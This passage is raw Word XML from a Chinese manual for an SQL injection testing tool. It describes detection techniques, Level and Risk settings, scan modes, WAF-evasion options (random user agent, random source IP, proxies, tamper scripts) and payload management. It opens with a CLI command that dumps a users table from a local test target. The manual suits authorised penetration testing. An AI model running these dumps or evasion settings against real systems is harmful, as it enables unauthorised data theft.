    <w:p w14:paraId="430BEFAA">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SuperSQLInjectionV2.Cmd -u "http://127.0.0.1:8090/JVApp/mysql.jsp?id=1" -D sqli_test -T users --dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D72B76">
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C9311D6">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>CLI 检出注入后自动复用注入点拼接对应数据库的取数 SQL，无需手工指定注入类型。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A7297A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>第 4 章 注入检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B2A07E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>4.1 检测类型（--technique=BEUTSD）</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:left w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:bottom w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:right w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:insideH w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:insideV w:val="single" w:sz="4" w:color="B8C2D1"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="40" w:type="dxa"/>
          <w:left w:w="80" w:type="dxa"/>
          <w:bottom w:w="40" w:type="dxa"/>
          <w:right w:w="80" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="907"/>
        <w:gridCol w:w="907"/>
        <w:gridCol w:w="4617"/>
        <w:gridCol w:w="3313"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="907"/>
            <w:shd w:val="clear" w:fill="1F3B63"/>
          </w:tcPr>
          <w:p w14:paraId="556E393C">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>字母</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="907"/>
            <w:shd w:val="clear" w:fill="1F3B63"/>
          </w:tcPr>
          <w:p w14:paraId="3EBC75F8">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4616"/>
            <w:shd w:val="clear" w:fill="1F3B63"/>
          </w:tcPr>
          <w:p w14:paraId="7D167AAC">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>原理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3314"/>
            <w:shd w:val="clear" w:fill="1F3B63"/>
          </w:tcPr>
          <w:p w14:paraId="34191F02">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>特点</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="907"/>
          </w:tcPr>
          <w:p w14:paraId="1944DF8E">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>B</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="907"/>
          </w:tcPr>
          <w:p w14:paraId="1CCE85E2">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Bool 盲注</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4616"/>
          </w:tcPr>
          <w:p w14:paraId="75D7C080">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>真 / 假条件页面差异（关键字 / 相似度 / 比值三种比对）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3314"/>
          </w:tcPr>
          <w:p w14:paraId="2D551FC4">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>通用性最强，速度较慢</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="907"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="77A2EF5E">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>E</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="907"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="1B69C280">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>报错注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4616"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="7693F2B8">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>触发数据库报错并回显数据（xpath / updatexml / floor 等）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3314"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="0747A9C2">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>回显快，依赖报错开启</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="907"/>
          </w:tcPr>
          <w:p w14:paraId="2AEA1BD0">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>U</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="907"/>
          </w:tcPr>
          <w:p w14:paraId="3ED36964">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Union 注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4616"/>
          </w:tcPr>
          <w:p w14:paraId="34241924">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>联合查询直接回显</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3314"/>
          </w:tcPr>
          <w:p w14:paraId="79B56218">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>最快，要求列数与类型匹配</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="907"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="16DD639E">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="907"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="37C3FF08">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>时间盲注</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4616"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="2D0CB6EE">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>sleep / benchmark 类延时判断</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3314"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="7880A49E">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>最慢但最隐蔽，抗干扰配置多</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="907"/>
          </w:tcPr>
          <w:p w14:paraId="32237DF8">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="907"/>
          </w:tcPr>
          <w:p w14:paraId="081E3516">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>堆叠注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4616"/>
          </w:tcPr>
          <w:p w14:paraId="22A4BF66">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>多语句执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3314"/>
          </w:tcPr>
          <w:p w14:paraId="723FFB84">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>依赖驱动支持（如 SQLServer、PostgreSQL）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="907"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="43A53AFC">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>D</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="907"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="7904A06C">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>DNS 外带</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4616"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="1C3A064C">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>数据经 DNS 解析带出（load_file / xp_dirtree 等）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3314"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="0E9F1E04">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>绕过无回显 + 出网受限场景</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6EB37BAA">
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="187128E0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>4.2 Level 与 Risk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0121D486">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>Level（1–5，默认 1）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>：检测用例的覆盖广度。级别越高，尝试的闭合方式（括号层数、引号类型）、注入位置（GET/POST/Cookie/UA/Referer 等头部）越多，请求量越大。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B90AF4">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>Risk（1–3，默认 1）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>：用例的风险等级。级别越高，包含越"重"的 payload（如 OR 条件、时间类、堆叠类），对目标影响越大。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B62933A">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">建议策略：先默认 Level 1 / Risk 1 快速过一遍；未检出再升 Level 2–3；仍无结果且确认存在注入时，配合 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>--dbms</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 收窄数据库类型 + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>--exhaustive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 穷举。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CADD2E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>4.3 检测模式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04853246">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>智能模式（--smart）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>：先跑高命中率用例与启发式判断（报错指纹扫描、单双引号扰动），命中即深测，大幅缩减请求量。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DF6768">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>穷举模式（--exhaustive）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>：不剪枝，跑完当前 Level/Risk 下全部用例，适合收尾确认。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>多参数并行（GUI「多参数并行」开关 / --parallel）：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>多参数目标（表单/JSON/XML/Cookie 等）按线程数并发检测（上限 10），N 个参数约 N 倍提速；参数间检测上下文（页面模板/相似度基线/库候选）各自独立互不影响，默认关闭（串行逐个检测）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>WAF 拦截反馈：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>某种检测技术发出的请求全部被拦截（HTTP 401/403/406/429/501）时，日志明确提示“疑似 WAF 防护拦截而非不存在注入”，并引导到防护绕过页配置随机 UA/随机源 IP/代理/延时/tamper 后重测——避免把“被拦”误判为“无注入”。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646DCF12">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>网页相似度抗噪</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>：对每次响应计算与基准页面的相似度，自动识别"软 404"、WAF 拦截页、动态噪声（广告位、时间戳），Bool 盲注判断以相似度为主、关键字为辅，显著降低误报。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D19274">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>报错指纹库</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">：报错注入识别基于独立维护的指纹库 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>config/injection/errors.xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>，在「检测用例」页的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>报错指纹</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>选项卡中可视化管理（分页浏览 / 新增 / 编辑 / 删除），可按数据库类型归类。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626F3C5C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>4.4 检测用例管理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E49008">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>「检测用例」页管理全部检测 payload（按数据库 × 注入类型 × Level/Risk 组织）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8165BA">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>支持查看 / 新增 / 编辑 / 删除用例，修改即时生效；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3D4B08">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>报错指纹独立分页管理，与用例分离；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032915AE">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">用例文件位于 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>config/injection/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 目录，可直接备份或迁移。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6411D388">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>4.5 检测预览与日志</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5847D8">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>检测概览</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>：实时显示当前测试的注入类型、数据库、已发请求数、命中状态；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3F9386">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>检测日志</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>：完整记录每次请求 / 响应（可在请求日志页回放）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E13750C">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>检测到时间盲注时，记录中同时保存</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>实测延时值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>，恢复记录后自动带出到数据管理的时间盲注通道配置。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B455C7C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>第 5 章 注入记录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD2A6D2">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>检测命中的注入点自动入库（不丢），「注入记录」页以表格形式持久展示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBFF1AE">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>字段</w:t>
      </w:r>
      <w:r>
        <w:rPr>
